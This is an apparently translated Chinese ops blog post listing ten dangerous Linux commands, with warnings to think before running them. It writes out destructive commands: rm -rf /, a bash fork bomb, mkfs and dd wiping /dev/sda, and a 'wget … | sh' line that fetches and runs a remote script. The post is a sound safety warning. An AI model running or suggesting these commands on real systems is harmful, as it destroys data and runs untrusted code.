來源頭條作者:波波說運維概述

大多數(shù)的朋友都是主要用的windows系統(tǒng)，基本用鼠標就可以完成所有的操作，但是在Linux系統(tǒng)中很多都是鍵盤+命令操作電腦的，Linux命令行使用很有趣，但有時候也很危險，尤其是在你不確定你自己正在做什么時候。今天分享這篇主要的目的是想讓你意識到在你運行某些命令時應該三思而后行。

1. rm -rf 命令

rm -rf命令是刪除文件夾及其內(nèi)容最快的方式之一。僅僅一丁點的敲錯或無知都可能導致不可恢復的系統(tǒng)崩壞。

下列是一些rm 命令的選項。

rm -r 命令遞歸的刪除文件夾，甚至是空的文件夾。（譯注：個人認為此處應該是說錯了，從常識看，應該是“甚至是非空的文件夾”） rm -f 命令能不經(jīng)過詢問直接刪除‘只讀文件’。（譯注：Linux下刪除文件并不在乎該文件是否是只讀的，而只是在意其父目錄是否有寫權(quán)限。所以，-f這個參數(shù)只是表示不必一個個刪除確認，而是一律悄悄刪除。另外，原始的rm命令其實也是沒有刪除提示的，只是一般的發(fā)行版都會將rm通過別名的方式增加-i參數(shù)來要求刪除確認，而-f則抑制了這個提示。） rm -rf / : 強制刪除根目錄下所有東東。（就是說刪除完畢后，什么也沒有了……） rm -rf *:　強制刪除當前目錄的所有文件。 rm -rf . : 強制刪除當前文件夾及其子文件夾。

無論什么時候，當你要執(zhí)行rm -rf命令時都需要留心一點。建議在“.bashrc”文件對‘rm‘命令創(chuàng)建rm -i的別名，來預防用 ‘rm‘命令刪除文件時的事故，它會要求你確認每一個刪除請求。

2. :(){:|:&};: 命令:() { : | : & };:

說明：

：在這里是一個函數(shù)名，我們定義之，并在后面執(zhí)行它。

：|：&，：函數(shù)的輸出通過管道傳給另一個冒號函數(shù)作為輸入，并且在后臺執(zhí)行。

{ };標識著里面的內(nèi)容是一個函數(shù)主體。

：為定義完成后的一次函數(shù)執(zhí)行。

這是個fork 炸彈的實例。具體操作是通過定義一個名為 ‘:‘的函數(shù)，它會調(diào)用自己兩次，一次在前臺另一次運行在后臺。它會反復的執(zhí)行下去直到系統(tǒng)崩潰。

原理解析

首先需要說明的是:是一個shell內(nèi)置命令，所以上面這段代碼只有在bash中才可能產(chǎn)生fork炸彈，因為在其他一些shell中，內(nèi)置命令的優(yōu)先級高于函數(shù)，所以執(zhí)行:，總是執(zhí)行內(nèi)置命令。（：是一個空命令，while true等同于 while ：，常用作占位符）

先來看看函數(shù)的主體：|：&，使用管道的時候是兩個進程同時開始執(zhí)行。

所以當執(zhí)行一個：函數(shù)時，產(chǎn)生兩個新進程，然后一個原來的進程退出，這樣不停地遞歸下去，就產(chǎn)生了一個無限遞歸。按照這個增長模式的化，其增長趨勢約為2n2n。

切記！千萬別在公司正式的服務(wù)器上實驗~~

3. 命令>/dev/sda

上列命令會將某個‘命令‘的輸出寫到塊設(shè)備/dev/sda中。該操作會將在塊設(shè)備中的所有數(shù)據(jù)塊替換為命令寫入的原始數(shù)據(jù)，從而導致整個塊設(shè)備的數(shù)據(jù)丟失。

4. mv 文件夾 /dev/null

這個命令會移動某個‘文件夾‘到/dev/null。在Linux中 /dev/null 或 null 設(shè)備是一個特殊的文件，所有寫入它的數(shù)據(jù)都會被清除，然后返回寫操作成功。

（其實這就是Linux所說的黑洞，通過將文件夾移動到黑洞，并不能阻止數(shù)據(jù)恢復軟件的恢復，所以，真正的徹底毀滅，需要采用專用的軟件或者手法來完成）

上列命令會將User目錄所有內(nèi)容移動到/dev/null，這意味著所有東西都被‘卷入’黑洞　(null)之中。

5. wget http://malicious_source -O- | sh

上列命令會從一個（也許是）惡意源下載一個腳本并執(zhí)行。Wget命令會下載這個腳本，而sh會（無條件的）執(zhí)行下載下來的腳本。

注意: 你應該時刻注意你下載包或腳本的源。只能使用那些從可信任的源中下載腳本/程序。

當遇到這種需要時，我一般做法是先wget下來，然后我去讀一讀其中到底寫了些什么，最后考慮是否執(zhí)行。

6. mkfs.ext3 /dev/sda

上列命令會格式化塊設(shè)備‘sda’，在執(zhí)行上列命令后塊設(shè)備(硬盤驅(qū)動器)會被格式化，嶄新的!

沒有任何數(shù)據(jù)，直接讓你的系統(tǒng)達到不可恢復的階段。

切記！無論什么時候在生產(chǎn)都不能執(zhí)行上述命令！

7. >file

上列命令常用來清空文件內(nèi)容（通常也用于記錄命令輸出。不過請在執(zhí)行前，確認輸出的文件是空的或者還不存在，否則原來的文件可真是恢復不了了）。

如果用上列執(zhí)行時輸入錯誤或無知的輸入類似 “>xt.conf”　的命令會覆蓋配置文件或其他任何的系統(tǒng)配置文件。

8. ^foo^bar

這個命令是用來編輯先前運行的命令而無需重打整個命令。但當用foobar命令時如果你沒有徹底檢查改變原始命令的風險，這可能導致真正的麻煩。

事實上，這種小技巧是譯者認為的，少數(shù)史前時代遺留下來的無用而有害的“黑客”技巧。

9. dd if=/dev/random of=/dev/sda

上列命令會向塊設(shè)備sda寫入隨機的垃圾文件從而擦出數(shù)據(jù)。當然！你的系統(tǒng)可能陷入混亂和不可恢復的狀態(tài)。

上面其實有提到mv到黑洞并不能徹底刪除數(shù)據(jù)，那么這個命令就是給了你一個徹底刪除的方法！當然為了保險起見，你可以覆寫多次。

10. 隱藏命令

下面的命令其實就是上面第一個命令 (rm -rf)。這里的代碼是隱藏在十六進制里的,一個無知的用戶可能就會被愚弄。在終端里運行下面命令可能會擦除你的根分區(qū)。

這個命令表明通常真正的危險是隱藏的，不會被輕易的檢測到。你必須時刻留心你在做什么結(jié)果會怎樣。不要編譯／運行從未知來源的代碼。

雖然有些命令是可以恢復回來的，但是誰都不想經(jīng)歷這個恢復的過程，不是嗎？所以，涉及到上面的命令一定要三思而后行！不過我們是搞技術(shù)的，是不是可以思考下怎么從技術(shù)上去避免這些命令呢？

后面會分享更多devops和DBA方面的內(nèi)容，感興趣的朋友可以關(guān)注一下~